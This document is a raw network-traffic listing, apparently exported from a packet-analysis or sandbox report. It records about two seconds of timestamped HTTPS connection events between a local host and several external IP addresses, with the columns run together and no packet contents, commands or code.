                                                                                                                                              Dec 19, 2024 07:52:28.279190063 CET4434971645.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:28.293096066 CET49716443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:28.335357904 CET4434971645.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:28.336915016 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:28.346276999 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:28.346318960 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:28.346472025 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:28.349252939 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:28.350471020 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:28.355029106 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:28.370774984 CET49713443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:28.370830059 CET49712443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:28.404287100 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:28.415062904 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:28.416842937 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:28.474627972 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:28.536338091 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:28.537996054 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:28.544903994 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:28.666754961 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:28.669758081 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:28.726789951 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:28.726962090 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:28.730484009 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:28.730730057 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:28.733057976 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:28.830446959 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:28.834212065 CET49718443192.168.2.9142.250.181.132
                                                                                                                                              Dec 19, 2024 07:52:28.834258080 CET44349718142.250.181.132192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:28.834486961 CET49718443192.168.2.9142.250.181.132
                                                                                                                                              Dec 19, 2024 07:52:28.834665060 CET49718443192.168.2.9142.250.181.132
                                                                                                                                              Dec 19, 2024 07:52:28.834683895 CET44349718142.250.181.132192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:28.850095034 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:28.852669954 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:28.856426954 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:28.859776020 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:28.918322086 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:28.921657085 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:29.026361942 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.041209936 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.042094946 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.045038939 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:29.047205925 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.047241926 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.047269106 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:29.047301054 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:29.050035000 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:29.050292969 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:29.160010099 CET4434971318.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.169557095 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.202826023 CET4434971318.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.202848911 CET4434971318.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.202939987 CET49713443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:29.202960014 CET4434971318.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.202970982 CET4434971318.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.203011036 CET49713443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:29.203015089 CET4434971318.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.203023911 CET4434971318.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.203072071 CET49713443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:29.203075886 CET4434971318.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.210356951 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.233339071 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.236537933 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:29.238933086 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.239116907 CET4434971645.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.239168882 CET4434971645.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.239229918 CET4434971645.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.239285946 CET49716443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:29.239285946 CET49716443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:29.239310026 CET4434971645.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.239402056 CET49716443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:29.241686106 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:29.268721104 CET49713443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:29.278470993 CET4434971645.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.278491974 CET4434971645.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.278537035 CET49716443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:29.278548002 CET4434971645.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.278615952 CET49716443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:29.353982925 CET4434971318.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.354000092 CET4434971318.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.354057074 CET4434971318.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.354074001 CET49713443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:29.356143951 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.361196041 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.361618996 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.366553068 CET4434971318.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.368067026 CET49713443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:29.368086100 CET4434971318.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.369231939 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.369246006 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.371340990 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:29.402173042 CET4434971318.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.402188063 CET4434971318.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.402226925 CET4434971318.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.402242899 CET4434971318.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.402251005 CET49713443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:29.402260065 CET4434971318.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.402277946 CET4434971318.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.402302980 CET49713443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:29.402302980 CET49713443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:29.402326107 CET49713443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:29.426178932 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:29.431612015 CET4434971318.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.431655884 CET4434971318.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.431689978 CET4434971318.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.431690931 CET49713443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:29.431724072 CET49713443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:29.431751013 CET49713443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:29.431751013 CET4434971318.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.431777954 CET4434971318.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.431802988 CET49713443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:29.431824923 CET49713443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:29.454437017 CET4434971645.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.454472065 CET4434971645.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.454524040 CET49716443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:29.454534054 CET4434971645.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.454545975 CET49716443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:29.485321999 CET4434971645.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.485336065 CET4434971645.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.485374928 CET49716443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:29.485409021 CET4434971645.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.485450029 CET4434971645.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.485459089 CET4434971645.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.485493898 CET4434971645.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.485533953 CET49716443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:29.485533953 CET49716443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:29.485533953 CET49716443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:29.485534906 CET4434971645.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.485557079 CET49716443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:29.487502098 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:29.489509106 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:29.514127016 CET4434971645.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.514175892 CET4434971645.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.514179945 CET49716443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:29.514225006 CET4434971645.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.514273882 CET4434971645.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.514286995 CET49716443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:29.514286995 CET49716443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:29.514300108 CET4434971645.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.514389038 CET49716443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:29.548993111 CET4434971318.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.549006939 CET4434971318.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.549025059 CET4434971318.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.549096107 CET49713443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:29.549105883 CET4434971318.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.549158096 CET49713443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:29.549875975 CET4434971645.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.549896002 CET4434971645.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.549925089 CET4434971645.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.549964905 CET49716443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:29.549971104 CET4434971645.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.549988985 CET49716443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:29.553214073 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.560952902 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.562669992 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:29.575700045 CET4434971318.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.575725079 CET4434971318.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.575767040 CET49713443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:29.575774908 CET4434971318.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.575923920 CET49713443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:29.596918106 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:29.596997023 CET4434971318.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.597018003 CET4434971318.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.597055912 CET49713443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:29.597062111 CET4434971318.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.597295046 CET49713443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:29.598592043 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:29.608963966 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.615796089 CET4434971318.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.615818024 CET4434971318.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.615880966 CET49713443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:29.615889072 CET4434971318.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.615935087 CET49713443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:29.623189926 CET49716443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:29.659687042 CET49712443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:29.677536964 CET4434971645.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.677547932 CET4434971645.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.677587986 CET4434971645.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.677613020 CET4434971645.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.677624941 CET4434971645.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.677642107 CET4434971645.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.677671909 CET49716443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:29.677671909 CET49716443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:29.678067923 CET49716443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:29.698890924 CET4434971645.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.698899031 CET4434971645.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.698928118 CET4434971645.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.698957920 CET4434971645.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.699001074 CET49716443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:29.699001074 CET49716443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:29.699006081 CET4434971645.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.699028969 CET49716443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:29.707336903 CET4434971218.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.718025923 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.720587015 CET4434971645.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.720608950 CET4434971645.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.720711946 CET49716443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:29.720711946 CET49716443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:29.720721960 CET4434971645.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.741041899 CET4434971318.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.741076946 CET4434971318.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.741132975 CET49713443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:29.741142035 CET4434971318.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.741184950 CET49713443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:29.741184950 CET49713443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:29.742223024 CET4434971645.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.742238998 CET4434971645.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.742295980 CET49716443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:29.742305994 CET4434971645.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.742332935 CET49716443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:29.748981953 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.749635935 CET4434971318.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.749677896 CET4434971318.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.749715090 CET49713443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:29.749722958 CET4434971318.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.750668049 CET49713443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:29.760920048 CET4434971645.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.760938883 CET4434971645.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.761018991 CET49716443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:29.761025906 CET4434971645.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.763891935 CET4434971318.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.763919115 CET4434971318.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.763998032 CET49713443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:29.763998032 CET49713443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:29.764005899 CET4434971318.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.764693975 CET49713443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:29.766011953 CET4434971318.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.766078949 CET49713443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:29.768024921 CET4434971318.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.768109083 CET49713443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:29.782402039 CET4434971318.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.782454967 CET4434971318.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.782480001 CET49713443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:29.782486916 CET4434971318.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.782579899 CET49713443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:29.782601118 CET4434971645.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.782614946 CET4434971645.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.782648087 CET49716443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:29.782654047 CET4434971645.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.782660961 CET4434971645.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.782672882 CET49716443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:29.782810926 CET49716443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:29.784295082 CET4434971318.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.784405947 CET49713443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:29.790209055 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:29.796690941 CET4434971318.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.796727896 CET4434971318.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.796768904 CET49713443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:29.796776056 CET4434971318.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.796835899 CET49713443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:29.801224947 CET4434971645.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.801275969 CET4434971645.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.801299095 CET4434971645.125.67.168192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.801327944 CET49716443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:29.801327944 CET49716443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:29.801377058 CET49716443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:29.804286003 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.804414034 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.804481030 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:29.808836937 CET4434971318.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.808883905 CET4434971318.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.808906078 CET49713443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:29.808913946 CET4434971318.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.808963060 CET49713443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:29.824088097 CET4434971318.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.824116945 CET4434971318.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.824162960 CET49713443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:29.824168921 CET4434971318.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.824364901 CET49713443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:29.836462975 CET4434971318.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.836491108 CET4434971318.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.836536884 CET49713443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:29.836543083 CET4434971318.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.836589098 CET49713443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:29.836589098 CET49713443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:29.864104033 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:29.869883060 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:29.871539116 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:29.873974085 CET49716443192.168.2.945.125.67.168
                                                                                                                                              Dec 19, 2024 07:52:29.913549900 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.913645029 CET4434970613.107.246.63192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.914482117 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:29.914979935 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:29.918689966 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:29.920367956 CET49706443192.168.2.913.107.246.63
                                                                                                                                              Dec 19, 2024 07:52:29.936086893 CET4434971318.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.936115980 CET4434971318.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.936196089 CET49713443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:29.936196089 CET49713443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:29.936203003 CET4434971318.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.936430931 CET49713443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:29.947500944 CET4434971318.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.947526932 CET4434971318.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.947623968 CET49713443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:29.947623968 CET49713443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:29.947632074 CET4434971318.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.947952986 CET49713443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:29.956787109 CET4434971318.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.956809044 CET4434971318.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.956870079 CET49713443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:29.956875086 CET4434971318.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.956934929 CET49713443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:29.956934929 CET49713443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:29.966970921 CET4434971318.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.966993093 CET4434971318.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.967031002 CET49713443192.168.2.918.161.69.16
                                                                                                                                              Dec 19, 2024 07:52:29.967036009 CET4434971318.161.69.16192.168.2.9
                                                                                                                                              Dec 19, 2024 07:52:29.967094898 CET49713443192.168.2.918.161.69.16
